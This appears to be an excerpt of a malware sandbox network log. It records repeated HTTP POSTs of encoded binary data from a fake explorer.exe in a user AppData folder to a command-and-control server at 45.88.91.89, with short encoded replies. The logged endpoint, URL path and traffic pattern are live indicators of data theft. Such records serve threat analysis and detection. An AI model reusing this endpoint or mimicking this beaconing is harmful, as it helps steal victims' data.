                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.64990145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:25.760771036 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:26.110188961 CET2568OUTData Raw: 53 50 58 59 56 5d 50 52 5b 5f 52 55 59 5a 57 59 57 5e 5f 5b 50 53 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPXYV]PR[_RUYZWYW^_[PSVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!-/ '?W?$3,R0<Y+0'+> T4%>&%>;$[' \,*
                                                      Dec 13, 2024 14:33:26.868753910 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:27.100920916 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:26 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.64990645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:27.353370905 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:27.704041958 CET2568OUTData Raw: 56 55 5d 5c 53 5b 55 52 5b 5f 52 55 59 5e 57 59 57 5f 5f 5f 50 5a 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]\S[UR[_RUY^WYW___PZV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".Z7$>><83Z33?;<?X'"!/Z1-9@'.;$[' \,
                                                      Dec 13, 2024 14:33:28.439193010 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:28.677053928 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:28 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.64990845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:28.920383930 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.64990945.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:29.399883986 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1428
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:29.751050949 CET1428OUTData Raw: 53 57 58 58 56 5b 55 52 5b 5f 52 55 59 5f 57 5d 57 53 5f 5e 50 5a 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWXXV[UR[_RUY_W]WS_^PZV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9($-#T+<+'<4U%,'Y*$&85_ [%1$.8--$[' \,>
                                                      Dec 13, 2024 14:33:30.383423090 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:30.621428013 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:30 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 1d 3f 07 28 0a 26 3b 24 50 33 3e 32 00 29 01 39 59 3a 06 3c 5b 27 1a 37 50 2b 0a 31 0e 2a 24 3f 1c 2a 1d 2d 59 21 2f 30 1f 2e 1c 2f 5f 0d 11 38 5f 20 2e 04 58 38 3e 30 00 2a 10 3e 06 2b 2c 2a 00 3d 2e 3f 01 27 02 25 0a 31 3e 22 50 2b 17 23 1f 2b 38 3b 02 2e 3f 29 5e 31 35 2f 57 0d 1e 27 1a 3f 0c 29 58 20 2b 27 00 35 03 25 13 2a 0a 2d 0c 21 07 3f 10 26 00 00 03 31 05 30 10 34 20 28 59 26 30 37 55 24 07 0d 55 32 15 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'?(&;$P3>2)9Y:<['7P+1*$?*-Y!/0./_8_ .X8>0*>+,*=.?'%1>"P+#+8;.?)^15/W'?)X +'5%*-!?&104 (Y&07U$U2.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.64991445.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:29.976506948 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2552
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:30.330091953 CET2552OUTData Raw: 56 56 5d 5f 56 5d 55 57 5b 5f 52 55 59 59 57 5b 57 5b 5f 5f 50 5e 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VV]_V]UW[_RUYYW[W[__P^VX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[![.,7_$'V><8',%/4(3Z&89^72Y10=0;$[' \,2
                                                      Dec 13, 2024 14:33:31.061721087 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:31.376888037 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:30 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.64991745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:31.620101929 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:31.969547033 CET2568OUTData Raw: 53 56 58 5b 53 5c 50 50 5b 5f 52 55 59 5b 57 59 57 5a 5f 5f 50 59 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SVX[S\PP[_RUY[WYWZ__PYVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!:,0#S<?+'4$<<<$X'>""?X2*3',$[' \,.
                                                      Dec 13, 2024 14:33:32.729222059 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:32.965502977 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.64992345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:33.213720083 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:33.563359976 CET2568OUTData Raw: 56 50 5d 58 53 5b 50 50 5b 5f 52 55 59 51 57 5a 57 58 5f 5d 50 5f 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VP]XS[PP[_RUYQWZWX_]P_V[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^9//Z'/?,+3?#3?7+$0&(9"!7[%=='Z/$[' \,
                                                      Dec 13, 2024 14:33:34.299746037 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:34.564147949 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.64992845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:34.808398008 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:35.157095909 CET2568OUTData Raw: 56 57 58 5f 53 5f 55 51 5b 5f 52 55 59 5a 57 59 57 5a 5f 5a 50 53 56 5f 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VWX_S_UQ[_RUYZWYWZ_ZPSV__AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["9,<3>(?;3Z V$<](4$(&#",$=>3#,-$[' \,*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.64993045.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:35.746550083 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:36.094605923 CET1456OUTData Raw: 53 55 5d 59 56 5a 55 5e 5b 5f 52 55 59 5d 57 5b 57 5f 5f 5f 50 5c 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SU]YVZU^[_RUY]W[W___P\VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!:<]'3<?'0/3Z'Y(B#X&;"7232>3?,=$[' \,6
                                                      Dec 13, 2024 14:33:36.832726955 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:37.065953970 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:36 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5a 3f 29 3c 0e 32 02 37 08 25 3d 3d 12 3e 06 21 5e 2e 2c 37 03 24 1d 24 09 2b 23 3e 55 3d 27 2f 5b 29 30 26 04 23 06 38 1c 2e 1c 2f 5f 0d 11 38 5e 22 3e 0b 00 2f 03 3b 11 3e 3e 0f 58 3f 59 22 00 2a 3e 06 59 27 15 32 1c 31 03 3e 50 3c 29 02 0c 2b 5d 38 5f 2d 2c 03 16 26 25 2f 57 0d 1e 27 54 3f 1c 31 5a 20 16 37 04 22 2d 32 03 29 27 31 0d 21 17 02 02 27 2e 2a 03 25 5a 33 0e 37 0d 09 03 32 33 3f 57 24 07 2f 1f 26 3f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'Z?)<27%==>!^.,7$$+#>U='/[)0&#8./_8^">/;>>X?Y"*>Y'21>P<)+]8_-,&%/W'T?1Z 7"-2)'1!'.*%Z3723?W$/&?.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.64993145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:35.868380070 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:36.219671965 CET2568OUTData Raw: 56 56 5d 5e 53 58 55 54 5b 5f 52 55 59 5e 57 58 57 5d 5f 53 50 5d 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VV]^SXUT[_RUY^WXW]_SP]V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[![-/#3>0+<33Z+0,_<$7Y3; !4%.$= Z;$[' \,
                                                      Dec 13, 2024 14:33:36.953609943 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:37.189125061 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:36 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.64993645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:37.432826042 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:37.782176971 CET2568OUTData Raw: 53 57 5d 5b 53 5b 50 52 5b 5f 52 55 59 5e 57 5b 57 59 5f 59 50 5a 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SW][S[PR[_RUY^W[WY_YPZV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!-<73.8+?;%<$Z'?408=#%&'>;8$[' \,
                                                      Dec 13, 2024 14:33:38.575155020 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:38.809088945 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.64994245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:39.067308903 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:39.422705889 CET2568OUTData Raw: 56 54 58 5c 56 5d 55 5f 5b 5f 52 55 59 5d 57 53 57 53 5f 5f 50 5e 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VTX\V]U_[_RUY]WSWS__P^VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9<(&>3?< X',(T3(($;X&; T?1>F$8=$[' \,6
                                                      Dec 13, 2024 14:33:40.153320074 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:40.393306971 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:40 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.64994545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:40.632817030 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:40.985248089 CET2568OUTData Raw: 53 50 5d 5d 56 5b 55 56 5b 5f 52 55 59 5c 57 5f 57 59 5f 5b 50 5d 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]]V[UV[_RUY\W_WY_[P]VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.<(0?Z<]3<40?7(4 0!Z4T+_&=%@$<Y-=$[' \,2
                                                      Dec 13, 2024 14:33:41.723052025 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:41.957170010 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:41 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.64995145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:42.199922085 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:42.547827005 CET1456OUTData Raw: 56 56 5d 53 56 55 55 57 5b 5f 52 55 59 58 57 5e 57 58 5f 52 50 53 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VV]SVUUW[_RUYXW^WX_RPSVY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".$.?S+<8]3 $<+\(+0_""^1>9'><8$[' \,"
                                                      Dec 13, 2024 14:33:43.287892103 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:43.522574902 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
